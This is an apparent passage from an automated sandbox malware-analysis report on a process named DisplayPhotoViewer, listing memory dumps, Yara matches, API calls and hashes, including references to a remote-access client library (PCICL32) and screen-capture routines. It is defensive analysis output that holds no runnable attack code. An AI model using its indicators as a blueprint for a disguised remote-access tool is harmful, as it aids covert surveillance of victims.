                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1616793339-0
                                                                                                    • Opcode ID: 688058804407d6e2ee4bc9a74d0f8d69e32334644716ef0ef732651734102757
                                                                                                    • Instruction ID: 03de8040e849dd5e668651183033c73fa30aab1ba865d7b137cda0edc4af50e4
                                                                                                    • Opcode Fuzzy Hash: 688058804407d6e2ee4bc9a74d0f8d69e32334644716ef0ef732651734102757
                                                                                                    • Instruction Fuzzy Hash: 8721C8B5A00255EBDB00DB68DC85B8EB7F4FB07B64F218315F520EB2C4CB74A9418B94
                                                                                                    Function 11139370 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: c5d3280205221fd340e84b6e60e30db366387d00a69467958e15e896dfb28251
                                                                                                    • Instruction ID: e3821f46530a3404db48b549671add8cfb53593bf613581d3259e9333743cb5e
                                                                                                    • Opcode Fuzzy Hash: c5d3280205221fd340e84b6e60e30db366387d00a69467958e15e896dfb28251
                                                                                                    • Instruction Fuzzy Hash: 9311E9B271824D9FE711CD14D6D0AAFFB6BEFC533AF20912EE95986648E2319842C750
                                                                                                    Function 110F3800 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110F382D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InformationToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 4114910276-0
                                                                                                    • Opcode ID: e572e4dfd36f3b2ac6433dbae879d6d5afa028d94d60a173cabc33b0214cb773
                                                                                                    • Instruction ID: 7a4e93372285c913da1012181bb6561cef08768253f197538b3e71b702d4a944
                                                                                                    • Opcode Fuzzy Hash: e572e4dfd36f3b2ac6433dbae879d6d5afa028d94d60a173cabc33b0214cb773
                                                                                                    • Instruction Fuzzy Hash: BC11A971A1065D9BDF51CFA8DC55BEEB3F8DB49704F4040D9E9099B340EA70AE49CB90
                                                                                                    Function 11165926 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,1102F68F,00000000,?,1115F594,?,1102F68F,00000000,00000000,00000000,?,11160F27,00000001,00000214,?,1110782E), ref: 11165969
                                                                                                      • Part of subcall function 1115EAAF: __getptd_noexit.LIBCMT ref: 1115EAAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 328603210-0
                                                                                                    • Opcode ID: 6f4d6b66766dd4dfe8de9f5fc7a6321507782b9d4e635d792f6b12f45ab5af02
                                                                                                    • Instruction ID: 313e7e69c54f07852998553f04f77f6103626d614787953a68b782c4070707a1
                                                                                                    • Opcode Fuzzy Hash: 6f4d6b66766dd4dfe8de9f5fc7a6321507782b9d4e635d792f6b12f45ab5af02
                                                                                                    • Instruction Fuzzy Hash: DD01D8353012269AFF968E61C954B56B75CAF837F4F014529EC69CA190FBB1D820C750
                                                                                                    Function 10007A80 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _FreeImage_GetFileTypeFromHandle@12.FREEIMAGE(?,00000000,?,?,103F9370), ref: 10007AC6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeFromHandle@12Image_Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 13891659-0
                                                                                                    • Opcode ID: bb46388ed4fd64222bf1fc8e7d83f31561b30475e5b32f7b630e25184afcfa3f
                                                                                                    • Instruction ID: 77ee815f78a67aa20ed704c5e45f7f6262cbe619b030d6fef70e95575e169688
                                                                                                    • Opcode Fuzzy Hash: bb46388ed4fd64222bf1fc8e7d83f31561b30475e5b32f7b630e25184afcfa3f
                                                                                                    • Instruction Fuzzy Hash: AFF0B479D08240179300DA584C0594BBAA4FFC02E0F404D1EF8AC53285D77A9528CBE3
                                                                                                    Function 1115CAA3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __waccess_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 4272103461-0
                                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                    • Instruction ID: 0134f9e8721d524dbcf083ea12549a3d448a2fae1be858a1fa593db6deee2031
                                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                    • Instruction Fuzzy Hash: 7BC02B3301401D3F4F048DF1EC00C443F4EC6802347104211F81C88090DE32E8108140
                                                                                                    Function 1027C531 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 1027C544
                                                                                                      • Part of subcall function 1029012C: RtlFreeHeap.NTDLL(00000000,00000000,?,1027C549,?,?,?,10001DFD), ref: 10290142
                                                                                                      • Part of subcall function 1029012C: GetLastError.KERNEL32(?,?,1027C549,?,?,?,10001DFD), ref: 10290154
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353095263-0
                                                                                                    • Opcode ID: 941aef3bf095b3a36b1896f22bd55b42b1966ddbe6e84e899dc70eec6287fc02
                                                                                                    • Instruction ID: d783bb707e52019166d7ddca8223eb6047d5917b189198769de99ece4bf57c24
                                                                                                    • Opcode Fuzzy Hash: 941aef3bf095b3a36b1896f22bd55b42b1966ddbe6e84e899dc70eec6287fc02
                                                                                                    • Instruction Fuzzy Hash: B7C08C3140420CBBCB00CF89E806A5EBBA9DB85320F200188FC0C07210DA76AE209AC0
                                                                                                    Function 111592B7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __fsopen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3646066109-0
                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                    • Instruction ID: fcf929dadc8dcc6e490536c9fb1a89c4f28d37fcad0ea91f970af9e0224269ae
                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                    • Instruction Fuzzy Hash: 81C09B7644010C77CF511942DC45E457F1E97D1674F044010FB2C19174A573E5619595
                                                                                                    Function 07E21000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _NSMClient32@8.PCICL32(?,?,?,07E210A2,00000000), ref: 07E2100B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 07E20000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_7e20000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Client32@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 433899448-0
                                                                                                    • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                    • Instruction ID: 22766281b8558116ff6cfcecda3f6908de310b341c4584554632a048572b1371
                                                                                                    • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                    • Instruction Fuzzy Hash: 2DB092B211834DDB8714EF99E840C7B339CAA98600B000809BE0543281CA71FC20A672

                                                                                                    Non-executed Functions

                                                                                                    Function 110076A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 11084060: IsWindow.USER32(1112865C), ref: 1108407C
                                                                                                      • Part of subcall function 11084060: IsWindow.USER32(?), ref: 11084096
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 110076EA
                                                                                                    • SetCursor.USER32(00000000), ref: 110076F1
                                                                                                    • GetDC.USER32(?), ref: 1100771D
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100772A
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007834
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007842
                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007856
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11007863
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007875
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110078A1
                                                                                                      • Part of subcall function 11002200: DeleteObject.GDI32(?), ref: 11002211
                                                                                                      • Part of subcall function 11002200: CreatePen.GDI32(?,?,?), ref: 11002238
                                                                                                      • Part of subcall function 11005A70: CreateSolidBrush.GDI32(?), ref: 11005A97
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110078CB
                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110078E0
                                                                                                    • DeleteObject.GDI32(00000000), ref: 110078ED
                                                                                                    • DeleteDC.GDI32(?), ref: 110078FA
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007917
                                                                                                    • ReleaseDC.USER32(?,?), ref: 11007946
                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007951
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007A42
                                                                                                    • GetSysColor.USER32(00000004), ref: 11007A50
                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007A67
                                                                                                      • Part of subcall function 11138730: GetObjectA.GDI32(11003CA6,00000018,?), ref: 11138743
                                                                                                      • Part of subcall function 11138730: CreateCompatibleDC.GDI32(00000000), ref: 11138751
                                                                                                      • Part of subcall function 11138730: CreateCompatibleDC.GDI32(00000000), ref: 11138756
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 1113876E
                                                                                                      • Part of subcall function 11138730: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11138781
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 1113878C
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,?), ref: 11138796
                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 111387B3
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,00000000), ref: 111387BC
                                                                                                      • Part of subcall function 11138730: SetTextColor.GDI32(00000000,00FFFFFF), ref: 111387C8
                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 111387E5
                                                                                                      • Part of subcall function 11138730: SetBkColor.GDI32(00000000,?), ref: 111387F0
                                                                                                      • Part of subcall function 11138730: SetTextColor.GDI32(00000000,00000000), ref: 111387F9
                                                                                                      • Part of subcall function 11138730: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11138816
                                                                                                      • Part of subcall function 11138730: SelectObject.GDI32(00000000,00000000), ref: 11138821
                                                                                                      • Part of subcall function 11107820: _malloc.LIBCMT ref: 11107829
                                                                                                      • Part of subcall function 11107820: _memset.LIBCMT ref: 11107852
                                                                                                    • _memset.LIBCMT ref: 11007AC7
                                                                                                    • _swscanf.LIBCMT ref: 11007B34
                                                                                                      • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007B65
                                                                                                    • _memset.LIBCMT ref: 11007B8C
                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007B9F
                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007BA6
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007BB3
                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007CF6
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007D33
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007D53
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007D70
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007DC0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007886
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
                                                                                                    • UpdateWindow.USER32(?), ref: 11007DF2
                                                                                                    • SetCursor.USER32(?), ref: 11007DFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
